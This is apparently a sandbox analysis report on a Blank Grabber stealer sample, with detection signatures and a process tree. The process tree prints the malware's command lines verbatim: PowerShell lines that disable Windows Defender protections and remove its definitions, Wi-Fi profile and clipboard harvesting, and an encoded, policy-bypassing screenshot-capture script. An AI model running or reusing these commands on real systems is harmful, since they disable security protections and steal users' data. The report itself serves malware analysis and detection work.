Edit tour

Windows Analysis Report
VaTlw2kNGc.exe

Overview

General Information

Sample name:	VaTlw2kNGc.exe renamed because original name is a hash value
Original sample name:	21dd41d299117fe5c556afc317f9fcbf.exe
Analysis ID:	1486327
MD5:	21dd41d299117fe5c556afc317f9fcbf
SHA1:	059dc993dace11614e1077fb0eb36c602ff347f1
SHA256:	a4cf3adaa9f44653f7bad93cbaebf994f398ccabf64e968b421266a7882b9a63
Tags:	BlankGrabberexe
Infos:

Detection

Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Sigma detected: Stop multiple services

Yara detected Blank Grabber

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected Telegram RAT

Yara detected Xmrig cryptocurrency miner

Yara detected zgRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Creates an undocumented autostart registry key

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Creates processes via WMI

Drops PE files with benign system names

Drops executable to a common third party application directory

Encrypted powershell cmdline option found

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Infects executable files (exe, dll, sys, html)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Suspicious Startup Folder Persistence

Sigma detected: System File Execution Location Anomaly

Sigma detected: WScript or CScript Dropper

Sigma detected: Windows Binaries Write Suspicious Extensions

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes or reads registry keys via WMI

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Too many similar processes found

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

VaTlw2kNGc.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\VaTlw2kNGc.exe" MD5: 21DD41D299117FE5C556AFC317F9FCBF)

VaTlw2kNGc.exe (PID: 6520 cmdline: "C:\Users\user\Desktop\VaTlw2kNGc.exe" MD5: 21DD41D299117FE5C556AFC317F9FCBF)

cmd.exe (PID: 1700 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Build.exe (PID: 5840 cmdline: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym MD5: 4FEC8FAF6590F62034AD44A54175B9E9)

hacn.exe (PID: 2676 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: FC445049713C02F9A9DDAA62E404C9E9)

hacn.exe (PID: 6584 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: FC445049713C02F9A9DDAA62E404C9E9)

cmd.exe (PID: 6256 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

s.exe (PID: 7204 cmdline: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym MD5: E5DB23B3AAF4DDDD2BAF96FB7BBA9616)

svchost.exe (PID: 7268 cmdline: "C:\ProgramData\svchost.exe" MD5: 45C59202DCE8ED255B4DBD8BA74C630F)

wscript.exe (PID: 7500 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 8188 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ChainComServermonitor.exe (PID: 8024 cmdline: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe" MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)

csc.exe (PID: 9108 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 9124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 9164 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES541F.tmp" "c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

setup.exe (PID: 7288 cmdline: "C:\ProgramData\setup.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)

based.exe (PID: 1700 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 838A5BD59DE32F425938CBA6C119CBEE)

based.exe (PID: 6900 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 838A5BD59DE32F425938CBA6C119CBEE)

cmd.exe (PID: 7296 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7536 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7304 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7440 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7344 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7512 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7468 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7824 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 648 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6760 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7932 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7408 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7240 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7996 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7208 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 8048 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7244 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8076 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 8260 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 7892 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 8340 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 7276 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8308 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8232 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8412 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANA